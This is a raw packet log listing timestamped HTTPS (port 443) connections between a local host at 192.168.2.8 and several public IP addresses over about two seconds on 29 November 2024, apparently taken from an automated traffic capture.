Nov 29, 2024 12:27:59.087331057 CET	443	49759	172.64.41.3	192.168.2.8
Nov 29, 2024 12:27:59.087335110 CET	443	49762	172.64.41.3	192.168.2.8
Nov 29, 2024 12:27:59.214715958 CET	443	49748	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:59.214792013 CET	443	49748	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:59.214864969 CET	49748	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:59.219691038 CET	49748	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:59.219711065 CET	443	49748	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:59.382010937 CET	49769	443	192.168.2.8	162.159.61.3
Nov 29, 2024 12:27:59.382050991 CET	443	49769	162.159.61.3	192.168.2.8
Nov 29, 2024 12:27:59.382118940 CET	49769	443	192.168.2.8	162.159.61.3
Nov 29, 2024 12:27:59.382395983 CET	49770	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:27:59.382432938 CET	443	49770	172.64.41.3	192.168.2.8
Nov 29, 2024 12:27:59.382522106 CET	49770	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:27:59.382582903 CET	49769	443	192.168.2.8	162.159.61.3
Nov 29, 2024 12:27:59.382594109 CET	443	49769	162.159.61.3	192.168.2.8
Nov 29, 2024 12:27:59.382728100 CET	49770	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:27:59.382745028 CET	443	49770	172.64.41.3	192.168.2.8
Nov 29, 2024 12:27:59.513118982 CET	49772	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:27:59.513164043 CET	443	49772	172.64.41.3	192.168.2.8
Nov 29, 2024 12:27:59.513226032 CET	49772	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:27:59.513515949 CET	49772	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:27:59.513530970 CET	443	49772	172.64.41.3	192.168.2.8
Nov 29, 2024 12:27:59.568470001 CET	49773	443	192.168.2.8	2.16.158.35
Nov 29, 2024 12:27:59.568521976 CET	443	49773	2.16.158.35	192.168.2.8
Nov 29, 2024 12:27:59.568659067 CET	49773	443	192.168.2.8	2.16.158.35
Nov 29, 2024 12:27:59.570734024 CET	49773	443	192.168.2.8	2.16.158.35
Nov 29, 2024 12:27:59.570743084 CET	443	49773	2.16.158.35	192.168.2.8
Nov 29, 2024 12:27:59.576935053 CET	49778	443	192.168.2.8	18.165.220.66
Nov 29, 2024 12:27:59.576946020 CET	443	49778	18.165.220.66	192.168.2.8
Nov 29, 2024 12:27:59.577007055 CET	49778	443	192.168.2.8	18.165.220.66
Nov 29, 2024 12:27:59.577337980 CET	49778	443	192.168.2.8	18.165.220.66
Nov 29, 2024 12:27:59.577353954 CET	443	49778	18.165.220.66	192.168.2.8
Nov 29, 2024 12:27:59.609380960 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:27:59.613358021 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:27:59.613423109 CET	49752	443	192.168.2.8	142.250.181.65
Nov 29, 2024 12:27:59.613431931 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:27:59.624885082 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:27:59.624933004 CET	49752	443	192.168.2.8	142.250.181.65
Nov 29, 2024 12:27:59.624943018 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:27:59.633708000 CET	49783	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:59.633753061 CET	443	49783	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:59.633860111 CET	49783	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:59.634097099 CET	49783	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:59.634110928 CET	443	49783	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:59.635099888 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:27:59.635170937 CET	49752	443	192.168.2.8	142.250.181.65
Nov 29, 2024 12:27:59.635193110 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:27:59.645697117 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:27:59.645750046 CET	49752	443	192.168.2.8	142.250.181.65
Nov 29, 2024 12:27:59.645760059 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:27:59.661150932 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:27:59.661240101 CET	49752	443	192.168.2.8	142.250.181.65
Nov 29, 2024 12:27:59.661257982 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:27:59.729280949 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:27:59.729338884 CET	49752	443	192.168.2.8	142.250.181.65
Nov 29, 2024 12:27:59.729357004 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:27:59.733453989 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:27:59.733493090 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:27:59.733510971 CET	49752	443	192.168.2.8	142.250.181.65
Nov 29, 2024 12:27:59.733520985 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:27:59.733551979 CET	49752	443	192.168.2.8	142.250.181.65
Nov 29, 2024 12:27:59.741903067 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:27:59.804558992 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:27:59.804653883 CET	49752	443	192.168.2.8	142.250.181.65
Nov 29, 2024 12:27:59.804677963 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:27:59.812624931 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:27:59.813750029 CET	49752	443	192.168.2.8	142.250.181.65
Nov 29, 2024 12:27:59.813770056 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:27:59.820749044 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:27:59.820800066 CET	49752	443	192.168.2.8	142.250.181.65
Nov 29, 2024 12:27:59.820813894 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:27:59.834383965 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:27:59.834435940 CET	49752	443	192.168.2.8	142.250.181.65
Nov 29, 2024 12:27:59.834450960 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:27:59.848342896 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:27:59.848407030 CET	49752	443	192.168.2.8	142.250.181.65
Nov 29, 2024 12:27:59.848428011 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:27:59.860292912 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:27:59.861761093 CET	49752	443	192.168.2.8	142.250.181.65
Nov 29, 2024 12:27:59.861776114 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:27:59.874042034 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:27:59.874116898 CET	49752	443	192.168.2.8	142.250.181.65
Nov 29, 2024 12:27:59.874135971 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:27:59.887734890 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:27:59.887814045 CET	49752	443	192.168.2.8	142.250.181.65
Nov 29, 2024 12:27:59.887845993 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:27:59.889254093 CET	443	49760	162.159.61.3	192.168.2.8
Nov 29, 2024 12:27:59.889303923 CET	49760	443	192.168.2.8	162.159.61.3
Nov 29, 2024 12:27:59.901412010 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:27:59.901470900 CET	49752	443	192.168.2.8	142.250.181.65
Nov 29, 2024 12:27:59.901484966 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:27:59.914150953 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:27:59.914212942 CET	49752	443	192.168.2.8	142.250.181.65
Nov 29, 2024 12:27:59.914227962 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:27:59.925942898 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:27:59.927469969 CET	443	49759	172.64.41.3	192.168.2.8
Nov 29, 2024 12:27:59.927573919 CET	49759	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:27:59.927589893 CET	49752	443	192.168.2.8	142.250.181.65
Nov 29, 2024 12:27:59.927628994 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:27:59.938055992 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:27:59.938133001 CET	49752	443	192.168.2.8	142.250.181.65
Nov 29, 2024 12:27:59.938143969 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:27:59.949831963 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:27:59.949896097 CET	49752	443	192.168.2.8	142.250.181.65
Nov 29, 2024 12:27:59.949923992 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:27:59.961611986 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:27:59.961688995 CET	49752	443	192.168.2.8	142.250.181.65
Nov 29, 2024 12:27:59.961698055 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:27:59.986493111 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:27:59.986645937 CET	49752	443	192.168.2.8	142.250.181.65
Nov 29, 2024 12:27:59.986659050 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:27:59.988811016 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:27:59.988861084 CET	49752	443	192.168.2.8	142.250.181.65
Nov 29, 2024 12:27:59.988877058 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:27:59.997183084 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:27:59.997231960 CET	49752	443	192.168.2.8	142.250.181.65
Nov 29, 2024 12:27:59.997246027 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:28:00.005050898 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:28:00.005129099 CET	49752	443	192.168.2.8	142.250.181.65
Nov 29, 2024 12:28:00.005137920 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:28:00.012964964 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:28:00.013014078 CET	49752	443	192.168.2.8	142.250.181.65
Nov 29, 2024 12:28:00.013020992 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:28:00.020550013 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:28:00.020617962 CET	49752	443	192.168.2.8	142.250.181.65
Nov 29, 2024 12:28:00.020626068 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:28:00.028284073 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:28:00.028357029 CET	49752	443	192.168.2.8	142.250.181.65
Nov 29, 2024 12:28:00.028366089 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:28:00.035725117 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:28:00.035783052 CET	49752	443	192.168.2.8	142.250.181.65
Nov 29, 2024 12:28:00.035790920 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:28:00.037131071 CET	443	49762	172.64.41.3	192.168.2.8
Nov 29, 2024 12:28:00.037204981 CET	49762	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:28:00.043360949 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:28:00.043430090 CET	49752	443	192.168.2.8	142.250.181.65
Nov 29, 2024 12:28:00.043437004 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:28:00.050843954 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:28:00.050919056 CET	49752	443	192.168.2.8	142.250.181.65
Nov 29, 2024 12:28:00.050929070 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:28:00.058624029 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:28:00.058684111 CET	49752	443	192.168.2.8	142.250.181.65
Nov 29, 2024 12:28:00.058692932 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:28:00.068373919 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:28:00.068444967 CET	49752	443	192.168.2.8	142.250.181.65
Nov 29, 2024 12:28:00.068456888 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:28:00.073862076 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:28:00.073908091 CET	49752	443	192.168.2.8	142.250.181.65
Nov 29, 2024 12:28:00.073920965 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:28:00.081595898 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:28:00.081651926 CET	49752	443	192.168.2.8	142.250.181.65
Nov 29, 2024 12:28:00.081665039 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:28:00.089598894 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:28:00.089745998 CET	49752	443	192.168.2.8	142.250.181.65
Nov 29, 2024 12:28:00.089775085 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:28:00.096416950 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:28:00.096539021 CET	49752	443	192.168.2.8	142.250.181.65
Nov 29, 2024 12:28:00.096555948 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:28:00.104626894 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:28:00.104671955 CET	49752	443	192.168.2.8	142.250.181.65
Nov 29, 2024 12:28:00.104688883 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:28:00.113322973 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:28:00.113368988 CET	49752	443	192.168.2.8	142.250.181.65
Nov 29, 2024 12:28:00.113377094 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:28:00.119710922 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:28:00.119757891 CET	49752	443	192.168.2.8	142.250.181.65
Nov 29, 2024 12:28:00.119766951 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:28:00.127275944 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:28:00.127383947 CET	49752	443	192.168.2.8	142.250.181.65
Nov 29, 2024 12:28:00.127392054 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:28:00.134949923 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:28:00.135008097 CET	49752	443	192.168.2.8	142.250.181.65
Nov 29, 2024 12:28:00.135014057 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:28:00.141424894 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:28:00.141468048 CET	49752	443	192.168.2.8	142.250.181.65
Nov 29, 2024 12:28:00.141474962 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:28:00.149393082 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:28:00.149445057 CET	49752	443	192.168.2.8	142.250.181.65
Nov 29, 2024 12:28:00.149457932 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:28:00.156214952 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:28:00.156258106 CET	49752	443	192.168.2.8	142.250.181.65
Nov 29, 2024 12:28:00.156277895 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:28:00.163184881 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:28:00.163242102 CET	49752	443	192.168.2.8	142.250.181.65
Nov 29, 2024 12:28:00.163253069 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:28:00.176496983 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:28:00.176533937 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:28:00.176553965 CET	49752	443	192.168.2.8	142.250.181.65
Nov 29, 2024 12:28:00.176563025 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:28:00.176601887 CET	49752	443	192.168.2.8	142.250.181.65
Nov 29, 2024 12:28:00.177426100 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:28:00.181067944 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:28:00.181129932 CET	49752	443	192.168.2.8	142.250.181.65
Nov 29, 2024 12:28:00.181138039 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:28:00.182635069 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:28:00.182676077 CET	49752	443	192.168.2.8	142.250.181.65
Nov 29, 2024 12:28:00.182689905 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:28:00.183032990 CET	49752	443	192.168.2.8	142.250.181.65
Nov 29, 2024 12:28:00.183043003 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:28:00.183082104 CET	443	49752	142.250.181.65	192.168.2.8
Nov 29, 2024 12:28:00.183125019 CET	49752	443	192.168.2.8	142.250.181.65
Nov 29, 2024 12:28:00.183160067 CET	49752	443	192.168.2.8	142.250.181.65
Nov 29, 2024 12:28:00.256788015 CET	443	49764	162.159.61.3	192.168.2.8
Nov 29, 2024 12:28:00.257131100 CET	49764	443	192.168.2.8	162.159.61.3
Nov 29, 2024 12:28:00.257179022 CET	443	49764	162.159.61.3	192.168.2.8
Nov 29, 2024 12:28:00.258239985 CET	443	49764	162.159.61.3	192.168.2.8
Nov 29, 2024 12:28:00.258321047 CET	49764	443	192.168.2.8	162.159.61.3
Nov 29, 2024 12:28:00.259558916 CET	49764	443	192.168.2.8	162.159.61.3
Nov 29, 2024 12:28:00.259625912 CET	443	49764	162.159.61.3	192.168.2.8
Nov 29, 2024 12:28:00.259681940 CET	49764	443	192.168.2.8	162.159.61.3
Nov 29, 2024 12:28:00.259696007 CET	443	49764	162.159.61.3	192.168.2.8
Nov 29, 2024 12:28:00.298367977 CET	443	49763	172.64.41.3	192.168.2.8
Nov 29, 2024 12:28:00.298692942 CET	49763	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:28:00.298722029 CET	443	49763	172.64.41.3	192.168.2.8
Nov 29, 2024 12:28:00.299808979 CET	443	49763	172.64.41.3	192.168.2.8
Nov 29, 2024 12:28:00.299875021 CET	49763	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:28:00.301095963 CET	443	49768	172.64.41.3	192.168.2.8
Nov 29, 2024 12:28:00.302700996 CET	49768	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:28:00.302728891 CET	443	49768	172.64.41.3	192.168.2.8
Nov 29, 2024 12:28:00.302859068 CET	49763	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:28:00.302932024 CET	443	49763	172.64.41.3	192.168.2.8
Nov 29, 2024 12:28:00.303224087 CET	49763	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:28:00.303797007 CET	443	49768	172.64.41.3	192.168.2.8
Nov 29, 2024 12:28:00.303853035 CET	49768	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:28:00.305651903 CET	49768	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:28:00.305722952 CET	443	49768	172.64.41.3	192.168.2.8
Nov 29, 2024 12:28:00.306042910 CET	49768	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:28:00.306051016 CET	443	49768	172.64.41.3	192.168.2.8
Nov 29, 2024 12:28:00.315932989 CET	49764	443	192.168.2.8	162.159.61.3
Nov 29, 2024 12:28:00.347348928 CET	443	49763	172.64.41.3	192.168.2.8
Nov 29, 2024 12:28:00.456197977 CET	49768	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:28:00.488976002 CET	49763	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:28:00.489016056 CET	443	49763	172.64.41.3	192.168.2.8
Nov 29, 2024 12:28:00.613236904 CET	49763	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:28:00.641700983 CET	443	49769	162.159.61.3	192.168.2.8
Nov 29, 2024 12:28:00.642626047 CET	49769	443	192.168.2.8	162.159.61.3
Nov 29, 2024 12:28:00.642647028 CET	443	49769	162.159.61.3	192.168.2.8
Nov 29, 2024 12:28:00.643702984 CET	443	49769	162.159.61.3	192.168.2.8
Nov 29, 2024 12:28:00.643815041 CET	49769	443	192.168.2.8	162.159.61.3
Nov 29, 2024 12:28:00.646738052 CET	49769	443	192.168.2.8	162.159.61.3
Nov 29, 2024 12:28:00.646804094 CET	443	49769	162.159.61.3	192.168.2.8
Nov 29, 2024 12:28:00.647253990 CET	49786	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:28:00.647309065 CET	443	49786	172.64.41.3	192.168.2.8
Nov 29, 2024 12:28:00.647386074 CET	49786	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:28:00.647439003 CET	49769	443	192.168.2.8	162.159.61.3
Nov 29, 2024 12:28:00.647449017 CET	443	49769	162.159.61.3	192.168.2.8
Nov 29, 2024 12:28:00.647705078 CET	49786	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:28:00.647720098 CET	443	49786	172.64.41.3	192.168.2.8
Nov 29, 2024 12:28:00.666052103 CET	443	49761	20.190.181.0	192.168.2.8
Nov 29, 2024 12:28:00.667933941 CET	49761	443	192.168.2.8	20.190.181.0
Nov 29, 2024 12:28:00.667972088 CET	443	49761	20.190.181.0	192.168.2.8
Nov 29, 2024 12:28:00.668937922 CET	49761	443	192.168.2.8	20.190.181.0
Nov 29, 2024 12:28:00.668945074 CET	443	49761	20.190.181.0	192.168.2.8
Nov 29, 2024 12:28:00.668977022 CET	49761	443	192.168.2.8	20.190.181.0
Nov 29, 2024 12:28:00.668984890 CET	443	49761	20.190.181.0	192.168.2.8
Nov 29, 2024 12:28:00.683053970 CET	443	49770	172.64.41.3	192.168.2.8
Nov 29, 2024 12:28:00.683904886 CET	49770	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:28:00.683918953 CET	443	49770	172.64.41.3	192.168.2.8
Nov 29, 2024 12:28:00.685028076 CET	443	49770	172.64.41.3	192.168.2.8
Nov 29, 2024 12:28:00.685101032 CET	49770	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:28:00.685920000 CET	49770	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:28:00.686026096 CET	443	49770	172.64.41.3	192.168.2.8
Nov 29, 2024 12:28:00.686439991 CET	49770	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:28:00.686446905 CET	443	49770	172.64.41.3	192.168.2.8
Nov 29, 2024 12:28:00.692514896 CET	443	49764	162.159.61.3	192.168.2.8
Nov 29, 2024 12:28:00.692585945 CET	443	49764	162.159.61.3	192.168.2.8
Nov 29, 2024 12:28:00.692642927 CET	49764	443	192.168.2.8	162.159.61.3
Nov 29, 2024 12:28:00.692935944 CET	49764	443	192.168.2.8	162.159.61.3
Nov 29, 2024 12:28:00.692949057 CET	443	49764	162.159.61.3	192.168.2.8
Nov 29, 2024 12:28:00.721467018 CET	49769	443	192.168.2.8	162.159.61.3
Nov 29, 2024 12:28:00.722107887 CET	443	49772	172.64.41.3	192.168.2.8
Nov 29, 2024 12:28:00.723267078 CET	49772	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:28:00.723288059 CET	443	49772	172.64.41.3	192.168.2.8
Nov 29, 2024 12:28:00.724760056 CET	443	49772	172.64.41.3	192.168.2.8
Nov 29, 2024 12:28:00.724869013 CET	49772	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:28:00.725543022 CET	49772	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:28:00.725626945 CET	443	49772	172.64.41.3	192.168.2.8
Nov 29, 2024 12:28:00.725686073 CET	49772	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:28:00.743455887 CET	443	49763	172.64.41.3	192.168.2.8
Nov 29, 2024 12:28:00.743532896 CET	443	49763	172.64.41.3	192.168.2.8
Nov 29, 2024 12:28:00.743784904 CET	49763	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:28:00.744008064 CET	49763	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:28:00.744030952 CET	443	49763	172.64.41.3	192.168.2.8
Nov 29, 2024 12:28:00.744271994 CET	49769	443	192.168.2.8	162.159.61.3
Nov 29, 2024 12:28:00.744355917 CET	443	49769	162.159.61.3	192.168.2.8
Nov 29, 2024 12:28:00.744452000 CET	49769	443	192.168.2.8	162.159.61.3
Nov 29, 2024 12:28:00.744887114 CET	443	49768	172.64.41.3	192.168.2.8
Nov 29, 2024 12:28:00.744952917 CET	443	49768	172.64.41.3	192.168.2.8
Nov 29, 2024 12:28:00.745086908 CET	49768	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:28:00.745312929 CET	49768	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:28:00.745327950 CET	443	49768	172.64.41.3	192.168.2.8
Nov 29, 2024 12:28:00.767554998 CET	49772	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:28:00.767568111 CET	443	49772	172.64.41.3	192.168.2.8
Nov 29, 2024 12:28:00.895348072 CET	443	49770	172.64.41.3	192.168.2.8
Nov 29, 2024 12:28:00.895416975 CET	49770	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:28:00.955193043 CET	49772	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:28:00.955326080 CET	443	49772	172.64.41.3	192.168.2.8
Nov 29, 2024 12:28:00.955439091 CET	49772	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:28:01.136656046 CET	443	49770	172.64.41.3	192.168.2.8
Nov 29, 2024 12:28:01.136737108 CET	443	49770	172.64.41.3	192.168.2.8
Nov 29, 2024 12:28:01.136842012 CET	49770	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:28:01.137128115 CET	49770	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:28:01.137145042 CET	443	49770	172.64.41.3	192.168.2.8
Nov 29, 2024 12:28:01.137726068 CET	443	49755	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:01.137782097 CET	443	49755	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:01.137856960 CET	49755	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:01.137892008 CET	49755	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:01.138956070 CET	49755	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:01.138977051 CET	443	49755	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:01.147304058 CET	443	49783	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:01.147836924 CET	49783	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:01.148179054 CET	49783	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:01.148190022 CET	443	49783	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:01.155950069 CET	443	49773	2.16.158.35	192.168.2.8
Nov 29, 2024 12:28:01.156373024 CET	49773	443	192.168.2.8	2.16.158.35
Nov 29, 2024 12:28:01.156384945 CET	443	49773	2.16.158.35	192.168.2.8
Nov 29, 2024 12:28:01.157458067 CET	443	49773	2.16.158.35	192.168.2.8
Nov 29, 2024 12:28:01.157510042 CET	49773	443	192.168.2.8	2.16.158.35
Nov 29, 2024 12:28:01.158483982 CET	49773	443	192.168.2.8	2.16.158.35
Nov 29, 2024 12:28:01.158548117 CET	443	49773	2.16.158.35	192.168.2.8
Nov 29, 2024 12:28:01.171914101 CET	49783	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:01.171938896 CET	443	49783	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:01.171974897 CET	49783	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:01.171984911 CET	443	49783	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:01.172002077 CET	49783	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:01.172008991 CET	443	49783	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:01.172065973 CET	49783	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:01.172065973 CET	49783	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:01.172080994 CET	443	49783	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:01.172092915 CET	443	49783	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:01.172194004 CET	49783	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:01.172202110 CET	443	49783	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:01.172224045 CET	49783	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:01.172235012 CET	443	49783	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:01.172326088 CET	49783	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:01.172333956 CET	443	49783	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:01.206990957 CET	49773	443	192.168.2.8	2.16.158.35
Nov 29, 2024 12:28:01.207009077 CET	443	49773	2.16.158.35	192.168.2.8
Nov 29, 2024 12:28:01.253108025 CET	49773	443	192.168.2.8	2.16.158.35
Nov 29, 2024 12:28:01.270291090 CET	49787	443	192.168.2.8	162.159.61.3
